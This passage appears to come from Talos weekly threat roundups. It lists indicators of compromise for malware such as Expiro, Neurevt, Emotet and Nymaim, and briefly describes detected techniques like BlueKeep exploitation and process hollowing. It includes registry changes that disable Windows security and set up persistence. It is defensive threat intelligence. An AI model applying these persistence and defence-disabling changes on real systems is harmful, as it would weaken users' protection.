a8fe11512ba3e48b178ad9ef994f48ec581394e69cbdb808f15c1432a762c636 b1e46c28ddff91c0d586933b500ce29bcf83fc094864c4227b6e70fa1981f064 b7cf83e8596736ced202a1de5e67fbaa5bdf9074697d548fdd83800802732ec4 b8c85a34ed5ccfe058c8ba65606add1efdcfe694d0f32e6b91e4b977da1392a8 bd68985801dd6b820c3a0c21883aa4ace809b2a62cbba278ac3a4d53166bcf85 cc1efac0bf7786ea4bbd4963d78aee4498e034dd778adce6977eca3d78666483 d3080983742d3deacdbc53a43b1482cfe1573ec8d957fba0f456a676dca3bd90 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A 
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella | N/A
Wsa | N/A

#### Screenshots of Detection

#### AMP

[](<https://1.bp.blogspot.com/-Kmwm7kXL8Ns/XZdfJq4vreI/AAAAAAAACuk/WOVujTC03JM3dM-kQHru22Tj4kR4RC9RQCLcBGAsYHQ/s1600/bd68985801dd6b820c3a0c21883aa4ace809b2a62cbba278ac3a4d53166bcf85_amp.png>)

#### ThreatGrid

[](<https://1.bp.blogspot.com/-MRt4ru8qx8w/XZdfO4C1MII/AAAAAAAACuo/zNE3AakVS3MgxWB5thlGv50WsYL-XH6fgCLcBGAsYHQ/s1600/bd68985801dd6b820c3a0c21883aa4ace809b2a62cbba278ac3a4d53166bcf85_tg.png>)

* * *

### Win.Virus.Expiro-7192043-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32` Value Name: `Type` | 8
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32` Value Name: `Start` | 8
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER` Value Name: `AntiVirusOverride` | 5
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER` Value Name: `AntiVirusDisableNotify` | 5
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER` Value Name: `FirewallDisableNotify` | 5
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER` Value Name: `FirewallOverride` | 5
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER` Value Name: `UpdatesDisableNotify` | 5
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER` Value Name: `UacDisableNotify` | 5
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM` Value Name: `EnableLUA` | 5
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE` Value Name: `EnableFirewall` | 5
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE` Value Name: `DoNotAllowExceptions` | 5
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE` Value Name: `DisableNotifications` | 5
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC` Value Name: `Start` | 5
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND` Value Name: `Start` | 5
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC` Value Name: `Start` | 5
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION` Value Name: `jfghdug_ooetvtgk` | 5
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` Value Name: `JudCsgdy` | 5
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV` Value Name: `Start` | 5
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` Value Name: `Windows Defender` | 5
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON` Value Name: `Userinit` | 5
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON` Value Name: `Userinit` | 5
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64` Value Name: `Type` | 3
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64` Value Name: `Start` | 3
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32` Value Name: `Type` | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32` Value Name: `Start` | 1

Mutexes | Occurrences
---|---
`SetupLauncher` | 12
`Global\<random guid>` | 11
`gazavat-svc` | 8
`kkq-vx_mtx<number, matching [0-9]{1,2}>` | 8
`{7930D12C-1D38-EB63-89CF-4C8161B79ED4}` | 5
`{79345B6A-421F-2958-EA08-07396ADB9E27}` | 5

IP Addresses contacted by malware. Does not indicate maliciousness

Domain Names contacted by malware. Does not indicate maliciousness

*See JSON for more IOCs

Files and or directories created | Occurrences
---|---
`%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe` | 8
`%System32%\alg.exe` | 8
`%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.log` | 8
`%SystemRoot%\SysWOW64\svchost.exe` | 8
`%System32%\<random, matching '[a-z]{8}'>.tmp` | 8
`%SystemRoot%\microsoft.net\framework\v2.0.50727\<random, matching '[a-z]{8}'>.tmp` | 8
`%LOCALAPPDATA%\bolpidti\judcsgdy.exe` | 5
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\judcsgdy.exe` | 5
`%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.lock` | 5
`%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngenservicelock.dat` | 5
`%LOCALAPPDATA%\bolpidti` | 4
`%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe` | 3
`%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngen_service.log` | 3
`\TEMP\ShMnr23` | 3
`%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe` | 1
`%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe` | 1
`%SystemRoot%\SysWOW64\cjnnhbik.tmp` | 1
`%SystemRoot%\SysWOW64\hmdklpnd.tmp` | 1
`%SystemRoot%\SysWOW64\ghnjiafh.tmp` | 1
`%SystemRoot%\SysWOW64\nojnfemc.tmp` | 1
`\TEMP\emf` | 1
`\TEMP\J3OHIb3` | 1
`%SystemRoot%\SysWOW64\ggaiaabg.tmp` | 1
`%SystemRoot%\SysWOW64\elmmpkjb.tmp` | 1
`%SystemRoot%\microsoft.net\framework64\v2.0.50727\jjicllfe.tmp` | 1

*See JSON for more IOCs

#### File Hashes

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
Amp |
Cloudlock | N/A
Cws |
Email Security |
Network Security |
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella |
Wsa |

#### Screenshots of Detection

#### AMP

[](<https://1.bp.blogspot.com/-guqbKk1KALI/XZdfmFc0OdI/AAAAAAAACuw/UIRzGpyFmhI9AVkph1Cak6NgjZCt6FQzQCLcBGAsYHQ/s1600/0b75593bf5cec1a4e6beecce8927ba895307c03d22387611fb6ced7805c2fa7b_amp.png>)

#### ThreatGrid

[](<https://1.bp.blogspot.com/--8eH6AJyv7o/XZdfqIKWukI/AAAAAAAACu0/Hp0eBDhQBFEcNMzAW2SyTgwtyVNez_9MwCLcBGAsYHQ/s1600/0b75593bf5cec1a4e6beecce8927ba895307c03d22387611fb6ced7805c2fa7b_tg.png>)

#### Umbrella

[](<https://1.bp.blogspot.com/-nbuUH19K8pI/XZdfvUc-nEI/AAAAAAAACu4/kaNc2n968KcIf10r_b-23kAiLkcpYN1jACLcBGAsYHQ/s1600/c075f037fea0578197e56a520708152779a9332195b96a52bac64ff10a914d82_umbrella.png>)

* * *

### Win.Malware.Neurevt-7192122-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\WIN7ZIP` Value Name: `Uuid` | 26
`<HKCU>\SOFTWARE\WIN7ZIP` | 26
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101` Value Name: `CheckSetting` | 26
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103` Value Name: `CheckSetting` | 26
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100` Value Name: `CheckSetting` | 26
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102` Value Name: `CheckSetting` | 26
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104` Value Name: `CheckSetting` | 26
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE` Value Name: `EnableFirewall` | 9
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\PUBLICPROFILE` Value Name: `EnableFirewall` | 9
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SSDPSRV` Value Name: `Start` | 9
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\RSTRUI.EXE` | 9
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\RSTRUI.EXE` Value Name: `Debugger` | 9
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` Value Name: `random` | 2
`<HKCR>\CLSID\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\10DF0332\CG1` Value Name: `GLA` | 1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\OMYLCQKSW.EXE` Value Name: `Debugger` | 1
`<HKCR>\CLSID\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\6EDA084A\CS1` | 1
`<HKCR>\CLSID\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\6EDA084A\CW1` | 1
`<HKCR>\CLSID\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\6EDA084A\CW1` Value Name: `1916` | 1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` Value Name: `Javaupdate` | 1
`<HKCR>\CLSID\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\6EDA084A\CG1` Value Name: `GLA` | 1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\BZSBKOTIU.EXE` Value Name: `Debugger` | 1
`<HKCR>\CLSID\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\5BDD0726` | 1
`<HKCR>\CLSID\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\5BDD0726\CS1` | 1
`<HKCR>\CLSID\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\5BDD0726\CW1` | 1
`<HKCR>\CLSID\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\5BDD0726\CG1` | 1

IP Addresses contacted by malware. Does not indicate maliciousness

Domain Names contacted by malware. Does not indicate maliciousness

*See JSON for more IOCs

Files and or directories created | Occurrences
---|---
`%HOMEPATH%\My Documents\My Videos\Desktop.ini` | 18
`%System32%\Tasks\Windows Update Check - 0x00000000` | 17
`%ProgramData%\riaiccape` | 3
`%ProgramData%\riaiccape\desktop.ini` | 3
`%ProgramData%\ubvhynpxh` | 2
`%ProgramData%\ubvhynpxh\desktop.ini` | 2
`%ProgramData%\hemxccape` | 2
`%ProgramData%\hemxccape\desktop.ini` | 2
`%ProgramData%\randomfolder\desktop.ini` | 2
`%ProgramData%\rpeulaaql\desktop.ini` | 1
`%ProgramData%\odoaztybt\desktop.ini` | 1
`%ProgramData%\mwvaztybt\desktop.ini` | 1
`%ProgramData%\safpdndnn\desktop.ini` | 1
`%ProgramData%\Javaupdate\desktop.ini` | 1
`%System32%\Tasks\Windows Update Check - 0x6EDA084A` | 1
`%ProgramData%\dtdasndku\desktop.ini` | 1
`%ProgramData%\Winrar_Update\desktop.ini` | 1
`%System32%\Tasks\Windows Update Check - 0x6E3308B1` | 1
`%ProgramData%\omylcqksw\desktop.ini` | 1
`%System32%\Tasks\Windows Update Check - 0x5FF907D6` | 1
`%ProgramData%\svchost\desktop.ini` | 1
`%System32%\Tasks\Windows Update Check - 0x19CF045A` | 1
`%System32%\Tasks\Windows Update Check - 0x0E7302EC` | 1
`%ProgramData%\skskjbpjx\desktop.ini` | 1

#### File Hashes

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
Amp |
Cloudlock | N/A
Cws |
Email Security |
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella |
Wsa |

#### Screenshots of Detection

#### AMP

[](<https://1.bp.blogspot.com/-YjM6h_iViKQ/XZdgApm3B4I/AAAAAAAACvE/iXocebKpt1UWw4GrvlYHiQt7OBUD0XPXQCLcBGAsYHQ/s1600/ac2c823fe5be07bc030e77510922ec076642c5ef5966b0ec56b6dfefcba06e34_amp.png>)

#### ThreatGrid

[](<https://1.bp.blogspot.com/-MjIQO5o6YDA/XZdgEz0zepI/AAAAAAAACvI/ilSTAIiY7nwrkGqqspWiBafNY9ebwNpagCLcBGAsYHQ/s1600/ac2c823fe5be07bc030e77510922ec076642c5ef5966b0ec56b6dfefcba06e34_tg.png>)

* * *

### Doc.Dropper.Emotet-7181950-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\FILEEXTS\.JS\OPENWITHPROGIDS` Value Name: `JSFile` | 38
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\FILEEXTS\.JS` | 38
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\FILEEXTS\.JS\OPENWITHPROGIDS` | 38
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\FILEEXTS\.JS\OPENWITHLIST` | 38
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS\IMPORT\RECOVER` Value Name: `Name` | 37
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS\IMPORT\RECOVER` Value Name: `Path` | 37
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS\IMPORT\RECOVER` Value Name: `Extensions` | 37
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS\IMPORT\WRDPRFCTDOS` Value Name: `Name` | 37
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS\IMPORT\WRDPRFCTDOS` Value Name: `Path` | 37
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS\IMPORT\WRDPRFCTDOS` Value Name: `Extensions` | 37
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS\IMPORT\WORDPERFECT6X` Value Name: `Name` | 37
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS\IMPORT\WORDPERFECT6X` Value Name: `Path` | 37
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS\IMPORT\WORDPERFECT6X` Value Name: `Extensions` | 37
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\YELLOWREPORTS` Value Name: `Type` | 37
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\YELLOWREPORTS` Value Name: `Start` | 37
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\YELLOWREPORTS` Value Name: `ErrorControl` | 37
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\YELLOWREPORTS` Value Name: `ImagePath` | 37
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\YELLOWREPORTS` Value Name: `DisplayName` | 37
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\YELLOWREPORTS` Value Name: `WOW64` | 37
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\YELLOWREPORTS` Value Name: `ObjectName` | 37
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS` | 37
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS\IMPORT` | 37
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS\IMPORT\RECOVER` | 37
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS\IMPORT\WRDPRFCTDOS` | 37
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS\IMPORT\WORDPERFECT6X` | 37

Mutexes | Occurrences
---|---
`Global\I98B68E3C` | 37
`Global\M98B68E3C` | 37
`Global\M3C28B0E4` | 19
`Global\I3C28B0E4` | 19

IP Addresses contacted by malware. Does not indicate maliciousness

Domain Names contacted by malware. Does not indicate maliciousness

*See JSON for more IOCs

Files and or directories created | Occurrences
---|---
`%LOCALAPPDATA%\Microsoft\Schemas\MS Word_restart.xml` | 38
`%TEMP%\0.7055475.js` | 38
`%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp` | 38
`%System32%\adjustmove.exe (copy)` | 19
`%SystemRoot%\SysWOW64\yellowreportsb.exe` | 5
`%SystemRoot%\SysWOW64\<random, matching '[a-zA-Z0-9]{4,19}'>.exe` | 4
`%TEMP%\inq6vpuc4.exe` | 1
`%TEMP%\llh1np4ba.exe` | 1
`%TEMP%\x5ra7abr9.exe` | 1
`%TEMP%\tlcebiev2.exe` | 1
`%TEMP%\qy2w0i9c1.exe` | 1
`%TEMP%\jrtj6nk6o.exe` | 1
`%TEMP%\fe2zt4mrb.exe` | 1
`%TEMP%\zmmkb0j7x.exe` | 1
`%TEMP%\ns8q8axim.exe` | 1
`%TEMP%\s1ucq6p8d.exe` | 1
`%TEMP%\fxmnkq4qt.exe` | 1
`%TEMP%\4l4u8k8s6.exe` | 1
`%TEMP%\lvn7pj1tq.exe` | 1
`%TEMP%\qz03ja0fx.exe` | 1
`%TEMP%\o2a6n5yed.exe` | 1
`%TEMP%\h04mv88ph.exe` | 1
`%TEMP%\9m0sfw639.exe` | 1
`%TEMP%\waymo412t.exe` | 1
`%TEMP%\9611f6amr.exe` | 1

*See JSON for more IOCs

#### File Hashes

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
Amp |
Cloudlock | N/A
Cws |
Email Security |
Network Security |
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella |
Wsa |

#### Screenshots of Detection

#### AMP

[](<https://1.bp.blogspot.com/-aQErGUAhErk/XZdgZaFekrI/AAAAAAAACvU/S3GztfUrhPYfx0lPCSJMlPYzov4RBdJGgCLcBGAsYHQ/s1600/1b5fd4653bdbb88ef0615c3a4b38e642630fddfd738ceafb893b6c860beb117a_amp.png>)

#### ThreatGrid

[](<https://1.bp.blogspot.com/-kFR2e9IlZIw/XZdgfz8BCkI/AAAAAAAACvY/8IDMucgOCmMR65yFbs8VaBK_wan-P1-0wCLcBGAsYHQ/s1600/1b5fd4653bdbb88ef0615c3a4b38e642630fddfd738ceafb893b6c860beb117a_tg.png>)

#### Umbrella

[](<https://1.bp.blogspot.com/-wbN8tgIUNvE/XZdgl3FBj2I/AAAAAAAACvc/71dEQOv_7RQt3gNa7LWby2xSZTOGTiiSQCLcBGAsYHQ/s1600/1be7caaba5194edf4387892d03521e968be5fa4b784a833b0c6321285694a660_umbrella.png>)

#### Malware

[](<https://1.bp.blogspot.com/-CjwR3PfrNwA/XZdgr8w6I5I/AAAAAAAACvk/48tfCNUJ0z4sRm_-IuhsH00lo9q38Z_FwCLcBGAsYHQ/s1600/16a9929e17b9fcc99f8d2eb5ec86b365239b0f957b187594f77319540ce5e5f1_malware.png>)

* * *

## Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits.
These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

CVE-2019-0708 detected - (12639)

An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption that can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since the vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.

Excessively long PowerShell command detected - (5242)

A PowerShell command with a very long command-line argument, which may indicate an obfuscated script, has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.

Madshi injection detected - (2444)

Madshi is a code injection framework that uses process injection to start a new thread if other methods of starting a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.

Kovter injection detected - (933)

A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.

Process hollowing detected - (443)

Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.

Atom Bombing code injection technique detected - (389)

A process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shellcode as a global Atom, then accessing it through an Asynchronous Procedure Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well.

Gamarue malware detected - (195)

Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.

Dealply adware detected - (186)

DealPly is adware that claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements into web pages. Adware has also been known to download and install malware.

Trickbot malware detected - (174)

Trickbot is a banking Trojan that appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected that some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving in the months since it appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.

Installcore adware detected - (116)

InstallCore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that displays advertising in the form of pop-ups or by injecting into browsers and adding or altering advertisements on web pages. Adware is known to sometimes download and install malware.

ID TALOSBLOG:5757EE09BE22E4808719C348402D3F43 Type talosblog Title Threat Roundup for September 27 to October 4 Published 2019-10-04T08:37:35 Modified 2019-10-04T08:37:35 CVSS 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C) Href http://feedproxy.google.com/~r/feedburner/Talos/~3/6x7noS5KGzQ/threat-roundup-for-september-27-to.html

* * *

Lastseen 2019-11-22T18:23:53 BulletinFamily blog CVE list CVE-2019-0708
Description

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 15 and Nov. 22. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics and indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness.
Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/blogs.cisco.com/2019/11/tru.json_.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
---|---|---
Win.Downloader.Nymaim-7391562-0 | Downloader | Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to for additional payloads.
Win.Trojan.Bunitu-7394346-0 | Trojan | Bunitu is malware that establishes a persistent foothold on an infected machine and then turns it into a proxy for criminal VPN services.
Win.Malware.Trickbot-7394707-1 | Malware | Trickbot is a banking Trojan targeting sensitive information for select financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Worm.Vobfus-7395002-0 | Worm | Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will launch when the system is booted. Once installed, it attempts to download follow-on malware from its C2 server.
Win.Malware.DarkComet-7395004-1 | Malware | DarkComet and related variants are a family of RATs designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system.
Win.Ransomware.Cerber-7395321-0 | Ransomware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns, this is no longer the case.
Win.Dropper.Remcos-7395733-0 | Dropper | Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. It is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.Tofsee-7402230-0 | Dropper | Tofsee is multipurpose malware that features several modules used to carry out malicious activities, such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator’s control.

* * *

## Threat Breakdown

### Win.Downloader.Nymaim-7391562-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\MICROSOFT\GOCFK` | 25
`<HKCU>\SOFTWARE\MICROSOFT\KPQL` | 25
`<HKCU>\SOFTWARE\MICROSOFT\GOCFK` Value Name: `mbijg` | 25
`<HKCU>\SOFTWARE\MICROSOFT\KPQL` Value Name: `efp` | 25

Mutexes | Occurrences
---|---
`Local\{369514D7-C789-5986-2D19-AB81D1DD3BA1}` | 25
`Local\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}` | 25
`Local\{D8E7AB94-6F65-71DE-8DA1-FE621BE2E606}` | 25
`Local\{F04311D2-A565-19AE-AB73-281BA7FE97B5}` | 25
`Local\{F6F578C7-92FE-B7B1-40CF-049F3710A368}` | 25
`Local\{0F53A50D-AEA8-402A-580B-3C32A490301E}` | 25
`Local\{42FDAA48-39A4-4464-9CC4-6F1A48111B12}` | 25

Domain Names contacted by malware. Does not indicate maliciousness

*See JSON for more IOCs

Files and or directories created | Occurrences
---|---
`%ProgramData%\ph` | 25
`%ProgramData%\ph\eqdw.dbc` | 25
`%ProgramData%\ph\fktiipx.ftf` | 25
`%TEMP%\gocf.ksv` | 25
`%TEMP%\kpqlnn.iuy` | 25
`%TEMP%\fro.dfx` | 24
`%TEMP%\npsosm.pan` | 24
`\Documents and Settings\All Users\pxs\dvf.evp` | 24
`\Documents and Settings\All Users\pxs\pil.ohu` | 24

#### File Hashes

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP |
Cloudlock | N/A
CWS |
Email Security |
Network Security |
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella | N/A
WSA |

#### Screenshots of Detection

#### AMP

[](<https://1.bp.blogspot.com/-dJQK21RVxuI/XdgSkbUbfVI/AAAAAAAAC6c/MZoblgpsix8XIvUo5UIjmOu1nS_ARpDPACLcBGAsYHQ/s1600/3b8723dccf6a910c012cba048918b741661a40bb9256356935af7dbf1c1417c4_amp.png>)

* * *

### Win.Trojan.Bunitu-7394346-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
